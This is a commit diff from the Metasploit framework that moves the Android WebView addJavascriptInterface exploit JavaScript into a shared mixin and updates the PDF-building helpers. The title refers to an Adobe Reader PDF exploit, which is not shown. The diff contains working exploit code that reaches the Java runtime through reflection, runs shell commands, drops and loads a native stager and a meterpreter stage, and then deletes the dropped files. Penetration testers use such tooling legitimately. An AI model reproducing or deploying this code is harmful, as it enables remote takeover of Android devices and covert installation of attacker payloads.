Land rapid7#3418 - android adobe reader addjisf pdf exploit

Merge branch 'landing-3418' into upstream-master

Author: timwr

lib/msf/core/exploit/android.rb

@@ -0,0 +1,101 @@
+# -*- coding: binary -*-
+require 'msf/core'
+
+module Msf
+module Exploit::Android
+
+  # Since the NDK stager is used, arch detection must be performed
+  SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ]
+
+  # Most android devices are ARM
+  DEFAULT_ARCH = ARCH_ARMLE
+
+  # Some of the default NDK build targets are named differently than
+  # msf's builtin constants. This mapping allows the ndkstager file
+  # to be looked up from the msf constant.
+  NDK_FILES = {
+    ARCH_ARMLE  => 'armeabi',
+    ARCH_MIPSLE => 'mips'
+  }
+
+  def add_javascript_interface_exploit_js(arch)
+    stagename = Rex::Text.rand_text_alpha(5)
+    script = %Q|
+      function exec(runtime, cmdArr) {
+        var ch = 0;
+        var output = '';
+        var process = runtime.exec(cmdArr);
+        var input = process.getInputStream();
+
+        while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); }
+        return output;
+      }
+
+      function attemptExploit(obj) {
+        // ensure that the object contains a native interface
+        try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
+
+        // get the pid
+        var pid = obj.getClass()
+                     .forName('android.os.Process')
+                     .getMethod('myPid', null)
+                     .invoke(null, null);
+
+        // get the runtime so we can exec
+        var runtime = obj.getClass()
+                         .forName('java.lang.Runtime')
+                         .getMethod('getRuntime', null)
+                         .invoke(null, null);
+
+        // libraryData contains the bytes for a native shared object built via NDK
+        // which will load the "stage", which in this case is our android meterpreter stager.
+        // LibraryData is loaded via ajax later, because we have to access javascript in
+        // order to detect what arch we are running.
+        var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
+
+        // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
+        // another stager which loads android meterpreter from the msf handler.
+        var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
+
+        // get the process name, which will give us our data path
+        // $PPID does not seem to work on android 4.0, so we concat pids manually
+        var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
+
+        var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
+        var stagePath = path + '/#{stagename}.apk';
+
+        // build the library and chmod it
+        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
+        runtime.exec(['chmod', '700', libraryPath]).waitFor();
+
+        // build the stage, chmod it, and load it
+        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
+        runtime.exec(['chmod', '700', stagePath]).waitFor();
+
+        // load the library
+        runtime.load(libraryPath);
+
+        // delete dropped files
+        runtime.exec(['rm', stagePath]).waitFor();
+        runtime.exec(['rm', libraryPath]).waitFor();
+
+        return true;
+      }
+
+      for (i in top) { if (attemptExploit(top[i]) === true) break; }
+    |
+
+    # remove comments and empty lines
+    script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')
+  end
+
+
+  # The NDK stager is used to launch a hidden APK
+  def ndkstager(stagename, arch)
+    localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')
+    data = File.read(localfile, :mode => 'rb')
+    data.gsub!('PLOAD', stagename)
+  end
+
+end
+end

lib/msf/core/exploit/mixins.rb

@@ -92,7 +92,7 @@
 # WBEM
 require 'msf/core/exploit/wbemexec'
 
-#WinRM
+# WinRM
 require 'msf/core/exploit/winrm'
 
 # WebApp
@@ -102,4 +102,8 @@
 require 'msf/core/exploit/remote/firefox_privilege_escalation'
 require 'msf/core/exploit/remote/firefox_addon_generator'
 
+# Android
+require 'msf/core/exploit/android'
+
+# Browser Exploit Server
 require 'msf/core/exploit/remote/browser_exploit_server'

lib/msf/core/exploit/pdf.rb

@@ -22,7 +22,7 @@ def initialize(info = {})
   )
 
   # We're assuming we'll only create one pdf at a time here.
-  @xref = []
+  @xref = {}
   @pdf = ''
   end
 
@@ -148,23 +148,18 @@ def nObfu(str)
   #PDF building block functions
   ##
   def header(version = '1.5')
-    hdr = "%PDF-1.5" << eol
+    hdr = "%PDF-#{version}" << eol
     hdr << "%" << RandomNonASCIIString(4) << eol
     hdr
   end
 
   def add_object(num, data)
-    @xref << @pdf.length
+    @xref[num] = @pdf.length
     @pdf << ioDef(num)
     @pdf << data
     @pdf << endobj
   end
 
-  def range_rand(min,max)
-    until min < r=rand(max); end
-    return r
-  end
-
   def finish_pdf
     @xref_offset = @pdf.length
     @pdf << xref_table
@@ -174,12 +169,19 @@ def finish_pdf
   end
 
   def xref_table
+    id = @xref.keys.max+1
     ret = "xref" << eol
-    ret << "0 %d" % (@xref.length + 1) << eol
+    ret << "0 %d" % id << eol
     ret << "0000000000 65535 f" << eol
-    @xref.each do |index|
-      ret << "%010d 00000 n" % index << eol
-    end
+    ret << (1..@xref.keys.max).map do |index|
+      if @xref.has_key?(index)
+        offset = @xref[index]
+        "%010d 00000 n" % offset << eol
+      else
+        "0000000000 00000 f" << eol
+      end
+    end.join
+
     ret
   end
 
@@ -196,7 +198,11 @@ def startxref
   end
 
   def eol
-    "\x0d\x0a"
+    @eol || "\x0d\x0a"
+  end
+
+  def eol=(new_eol)
+    @eol = new_eol
   end
 
   def endobj
@@ -267,7 +273,7 @@ def SelectEncoder(js,strEncode,strFilter)
   #Create PDF with Page implant
   ##
   def pdf_with_page_exploit(js,strFilter)
-    @xref = []
+    @xref = {}
     @pdf = ''
 
     @pdf << header
@@ -290,7 +296,7 @@ def pdf_with_page_exploit(js,strFilter)
   # you try to merge the exploit PDF with an innocuous one
   ##
   def pdf_with_openaction_js(js,strFilter)
-    @xref = []
+    @xref = {}
     @pdf = ''
 
     @pdf << header
@@ -313,7 +319,7 @@ def pdf_with_openaction_js(js,strFilter)
   #Create PDF with a malicious annotation
   ##
   def pdf_with_annot_js(js,strFilter)
-    @xref = []
+    @xref = {}
     @pdf = ''
 
     @pdf << header
@@ -332,5 +338,6 @@ def pdf_with_annot_js(js,strFilter)
 
     finish_pdf
   end
+
 end
 end

modules/exploits/android/browser/webview_addjavascriptinterface.rb

@@ -4,25 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/android'
 
 class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::BrowserExploitServer
   include Msf::Exploit::Remote::BrowserAutopwn
-
-  # Since the NDK stager is used, arch detection must be performed
-  SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ]
-
-  # Most android devices are ARM
-  DEFAULT_ARCH = ARCH_ARMLE
-
-  # Some of the default NDK build targets are named differently than
-  # msf's builtin constants. This mapping allows the ndkstager file
-  # to be looked up from the msf constant.
-  NDK_FILES = {
-    ARCH_ARMLE  => 'armeabi',
-    ARCH_MIPSLE => 'mips'
-  }
+  include Msf::Exploit::Android
 
   autopwn_info(
     :os_flavor  => 'Android',
@@ -105,84 +93,6 @@ def on_request_exploit(cli, req, browser)
     send_response_html(cli, html(arch))
   end
 
-  # The NDK stager is used to launch a hidden APK
-  def ndkstager(stagename, arch)
-    localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')
-    data = File.read(localfile, :mode => 'rb')
-    data.gsub!('PLOAD', stagename)
-  end
-
-  def js(arch)
-    stagename = Rex::Text.rand_text_alpha(5)
-    script = %Q|
-      function exec(runtime, cmdArr) {
-        var ch = 0;
-        var output = '';
-        var process = runtime.exec(cmdArr);
-        var input = process.getInputStream();
-
-        while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); }
-        return output;
-      }
-
-      function attemptExploit(obj) {
-        // ensure that the object contains a native interface
-        try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
-
-        // get the pid
-        var pid = obj.getClass()
-                     .forName('android.os.Process')
-                     .getMethod('myPid', null)
-                     .invoke(null, null);
-
-        // get the runtime so we can exec
-        var runtime = obj.getClass()
-                         .forName('java.lang.Runtime')
-                         .getMethod('getRuntime', null)
-                         .invoke(null, null);
-
-        // libraryData contains the bytes for a native shared object built via NDK
-        // which will load the "stage", which in this case is our android meterpreter stager.
-        // LibraryData is loaded via ajax later, because we have to access javascript in
-        // order to detect what arch we are running.
-        var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
-
-        // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
-        // another stager which loads android meterpreter from the msf handler.
-        var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
-
-        // get the process name, which will give us our data path
-        // $PPID does not seem to work on android 4.0, so we concat pids manually
-        var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
-
-        var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
-        var stagePath = path + '/#{stagename}.apk';
-
-        // build the library and chmod it
-        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
-        runtime.exec(['chmod', '700', libraryPath]).waitFor();
-
-        // build the stage, chmod it, and load it
-        runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
-        runtime.exec(['chmod', '700', stagePath]).waitFor();
-
-        // load the library (this fails in x86, figure out why)
-        runtime.load(libraryPath);
-
-        // delete dropped files
-        runtime.exec(['rm', stagePath]).waitFor();
-        runtime.exec(['rm', libraryPath]).waitFor();
-
-        return true;
-      }
-
-      for (i in top) { if (attemptExploit(top[i]) === true) break; }
-    |
-
-    # remove comments and empty lines
-    script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')
-  end
-
   # Called when a client requests a .js route.
   # This is handy for post-XSS.
   def serve_static_js(cli, req)
@@ -191,7 +101,7 @@ def serve_static_js(cli, req)
 
     if arch.present?
       print_status("Serving javascript for arch #{normalize_arch arch}")
-      send_response(cli, js(normalize_arch arch), response_opts)
+      send_response(cli, add_javascript_interface_exploit_js(normalize_arch arch), response_opts)
     else
       print_status("Serving arch detection javascript")
       send_response(cli, static_arch_detect_js, response_opts)